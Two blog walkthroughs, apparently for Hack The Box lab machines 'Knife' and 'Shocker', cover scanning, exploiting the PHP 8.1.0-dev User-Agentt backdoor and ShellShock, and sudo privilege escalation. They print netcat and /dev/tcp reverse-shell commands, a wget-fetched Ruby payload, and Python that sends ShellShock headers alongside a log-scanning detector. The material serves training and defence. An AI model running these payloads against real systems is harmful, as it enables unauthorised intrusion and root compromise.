Wednesday, June 23, 2021

Knife | Hack The Box | Walkthrough

Hi Guys!! In this blog we will cover the HTB CTF challenge machine named "Knife", which is rated easy. Capture the flag (CTF) challenges touch on many aspects of information security, and they are full of learning about new vulnerabilities, RCE, privilege escalation, etc.

Note:
Before you go through this blog, "Try Harder" on the box yourself first; you may not need this walkthrough at all.

Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation

  1. Scanning
The first step is to scan the ports and services running on the target. One of the most popular port scanners is Nmap, which lets the attacker discover open ports and the services behind them. The screenshot below shows that ports 22 and 80 are open.

nmap -sC -sV 10.10.10.242

Exhibit 1

  2. Enumeration
Now that we know ports 80 and 22 are open, we will run the nikto tool against port 80. Nikto is a command-line vulnerability scanner that checks web servers for dangerous files/CGIs, outdated server software and other problems.
We can see the PHP version (PHP/8.1.0-dev) disclosed in the X-Powered-By response header.

nikto -h http://10.10.10.242/

Exhibit 2
  3. Exploiting
Searching for this version turns up a "PHP 8.1.0-dev 'User-Agentt' Remote Code Execution" exploit on Exploit-DB. 8.1.0-dev is not a released PHP version: in March 2021 a backdoor was planted in the PHP git repository, and builds that carry it execute code supplied in a request header named User-Agentt. Download the exploit code.

Exhibit 3

Let’s run the exploit code. Provide the target URL and press Enter, and you get a shell, as shown in the screenshot below -

Exhibit 4

Since the shell provided by the exploit is unreliable (garbage in the output), let’s take a proper reverse shell with the commands below, as shown in the screenshot. First start a listener on the attacker machine:

nc -nvlp 4444

Then, from the exploit shell on the target, connect back with a named-pipe reverse shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Attacker's IP] 4444 >/tmp/f

Finally, upgrade the shell to a PTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'


Exhibit 5

Congrats!! We have a reverse shell as the user james and can read the user.txt flag.
  4. Privilege Escalation
I looked at the user's sudo permissions with sudo -l and found something interesting.

sudo -l

Exhibit 6

The user james can execute /usr/bin/knife as root without a password. knife is the Chef command-line tool, and its manual shows that the exec subcommand runs arbitrary Ruby, either from a script file or from a string passed with --exec (-E). Anything that Ruby spawns therefore runs as root:

sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

OR

# Create a file named "root.rb" on the attacker machine with the following contents (a reverse shell to a listener on port 1234) and serve it over HTTP on port 6666:
#!/usr/bin/env ruby
exec "/bin/bash -c '/bin/bash >& /dev/tcp/[Attacker's IP]/1234 0>&1'"

# On the target, fetch the script and run it through knife:
cd /tmp; wget http://[Attacker's IP]:6666/root.rb
sudo /usr/bin/knife exec /tmp/root.rb

BINGO!!! As shown in the screenshot below, we executed the command and got a root shell.

Exhibit 7

Hope you learned and enjoyed it!!


Friday, June 18, 2021

Shocker | Hack The Box | CTF Walkthrough

Hi Guys!! In this blog, we will cover the HTB CTF challenge machine named "Shocker", which is rated easy. Capture the flag (CTF) challenges can help you understand many aspects of information security, and CTF/HTB challenges are full of learning about new vulnerabilities, RCE, privilege escalation, etc.


Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation



  1. Scanning
The first step is to scan the ports and services running on the target. One of the most popular port scanners is Nmap, which lets us discover open ports and the services running on them.

nmap -sC -sV 10.10.10.56

Exhibit 1
  2. Enumeration
Now that we know ports 80 and 2222 are open, let's see what is running on 80. There is just a picture.

Exhibit 2


Let us enumerate the web server with Dirb.

Dirb (and the GUI DirBuster) brute-forces directories and files on a web server using a wordlist.

dirb http://10.10.10.56/

Exhibit 3

Note: A request for a directory without a trailing slash is usually answered with a redirect to the same path with a trailing slash. Tools like `dirb` and `dirsearch` send two requests per wordlist entry, one with and one without the trailing slash, while `gobuster` and `feroxbuster` have a -f flag to force a trailing slash on directory requests.

We get 403 Forbidden when accessing the cgi-bin directory, as shown in Exhibit 4: the directory exists but listing it is denied, so we brute-force the files inside it.

Exhibit 4

Let’s run dirb again against cgi-bin with -X, which appends the likely extensions .php, .sh and .html to each wordlist entry.

dirb http://10.10.10.56/cgi-bin /usr/share/wordlists/dirb/common.txt -X .php,.sh,.html

Exhibit 5

As shown in Exhibit 5, we found a user.sh file. Let's check the response we get when browsing to user.sh.

Note: As we can see in Exhibit 6, there are two Content-Type headers, text/x-sh and text/plain. The script apparently tries to set text/plain, but that line is emitted after the blank line that ends the CGI headers, so it becomes part of the body rather than a header. The server therefore serves the file as text/x-sh, which is why the browser downloads it instead of displaying it.

The body also contains output resembling the Linux "uptime" command, suggesting user.sh is a bash CGI script. Bash CGI scripts in cgi-bin are the classic target for ShellShock.

Exhibit 6

ShellShock (CVE-2014-6271) is a bash vulnerability disclosed in 2014 in bash's "function export" feature: bash imported function definitions from environment variables and kept parsing, and executing, whatever followed the function body. An attacker who controls an environment variable therefore gets command execution. The initial PoC was:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

The impact was huge because many programs put user input into environment variables before invoking a shell; the most famous case is CGI scripts behind a web server, which receive the request headers as HTTP_* environment variables.
  3. Exploiting
Since the machine is named Shocker and we found a bash CGI script, it is reasonable to assume the intended path is ShellShock.

Let's check if Shellshock vulnerability exists using Nmap script -

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.56

Exhibit 7

Nmap Script shows that it is vulnerable to ShellShock vulnerability. 

Let's tamper with the Cookie header by sending the following value and see the response -

Cookie: () { :; }; echo ; /bin/ls

Exhibit 8

The response body now contains the output of /bin/ls: the script's directory holds user.sh, which confirms command execution.

Cookie: () { :; }; echo; /usr/bin/id

Exhibit 9

Note: The commands need full paths because $PATH is empty in the environment the injected command runs in. The payload executed successfully in the Referer, Cookie and User-Agent headers, as Apache passes each of them to the CGI script as an environment variable (HTTP_REFERER, HTTP_COOKIE, HTTP_USER_AGENT).

Let's get a reverse shell by exploiting this vulnerability. Start a Netcat listener on TCP port 5555 with `nc -nvlp 5555`, then send the following header:

Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.37/5555 0>&1

Exhibit 10
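Both sides of the ShellShock exchange above, plus the local PoC from the previous section, as an added example that is not part of the original walkthrough: the header builder reproduces the payloads sent through the Cookie, User-Agent and Referer headers, the local check runs the 2014 PoC against the bash on the machine the script runs on, and the log scanner looks for the trigger in constructed Apache access-log lines. The function names and the sample log lines are this example's own. Note that the default combined LogFormat records Referer and User-Agent but not Cookie, so Cookie-borne payloads only show up in the access log if %{Cookie}i is added to the log format.

```python
"""Shellshock (CVE-2014-6271) against a bash CGI script: attack and detection.

Added example, not part of the original walkthrough. Apache exports each
request header to the CGI script as an environment variable (HTTP_COOKIE,
HTTP_USER_AGENT, HTTP_REFERER, ...); an unpatched bash treats a value that
starts with "() { :; };" as an exported function definition and executes
whatever follows it. The sample log lines below are constructed, not real.
"""
import os
import re
import subprocess
import urllib.error
import urllib.request
from typing import List, Optional, Tuple

# Function-definition prefix that a vulnerable bash mis-parses.
TRIGGER = "() { :; };"


def shellshock_headers(command: str, header: str = "Cookie") -> dict:
    """Return a header dict carrying a Shellshock payload in `header`.

    "echo;" emits the blank line that ends the CGI response headers so the
    command's output lands in the body. Use full binary paths: PATH is not
    populated in the environment the injected command runs in.
    """
    return {header: f"{TRIGGER} echo; {command}"}


def probe(url: str, command: str = "/usr/bin/id", header: str = "Cookie",
          timeout: float = 10) -> str:
    """Send one request with the payload and return the response body.

    A 500 is common when the payload breaks the script's own headers, so the
    body of an HTTP error response is returned as well."""
    req = urllib.request.Request(url, headers=shellshock_headers(command, header))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode(errors="replace")


def local_bash_vulnerable() -> Optional[bool]:
    """Run the 2014 PoC against this machine's bash. None if bash is absent."""
    env = dict(os.environ, x="() { :;}; echo vulnerable")
    try:
        out = subprocess.run(["bash", "-c", "echo this is a test"], env=env,
                             capture_output=True, text=True, timeout=10).stdout
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in out


# Detection side: the trigger with any whitespace variation ("(){:;};" and
# "() { :;};" both appear in real scanning traffic).
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{\s*:\s*;\s*\}\s*;")

# Constructed Apache "combined" log lines: host ... request status bytes referer user-agent.
ACCESS_LOG_LINES = [
    '10.10.14.37 - - [18/Jun/2021:10:01:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.10.14.37 - - [18/Jun/2021:10:01:15 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 64 "-" "() { :; }; echo; /usr/bin/id"',
    '10.10.14.37 - - [18/Jun/2021:10:02:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "() { :;}; /bin/bash -i >& /dev/tcp/10.10.14.37/5555 0>&1" "curl/7.74.0"',
    '10.10.14.37 - - [18/Jun/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
]


def find_shellshock_attempts(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, offending fragment) for each log line with the trigger."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = SHELLSHOCK_RE.search(line)
        if match:
            hits.append((number, line[match.start():match.start() + 60]))
    return hits


if __name__ == "__main__":
    print("local bash vulnerable:", local_bash_vulnerable())
    for number, fragment in find_shellshock_attempts(ACCESS_LOG_LINES):
        print(f"line {number}: {fragment}")
```

probe() is the only function that touches the network; everything else runs offline, and the regex is deliberately loose on whitespace so it also catches the variants real scanners send.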

Congrats!! We got the reverse shell and user flag as shown in Exhibit 11.

Exhibit 11
  4. Privilege Escalation
A basic manual check with "sudo -l" shows that the user can execute /usr/bin/perl as root without a password. Let us use this misconfiguration to gain root access.

Exhibit 12

We abuse this sudo misconfiguration with perl's exec function to spawn a root shell from the shell we are working in -

Exhibit 13

BINGO!! We got the root shell and root flag.

Hope you learned and enjoyed it!!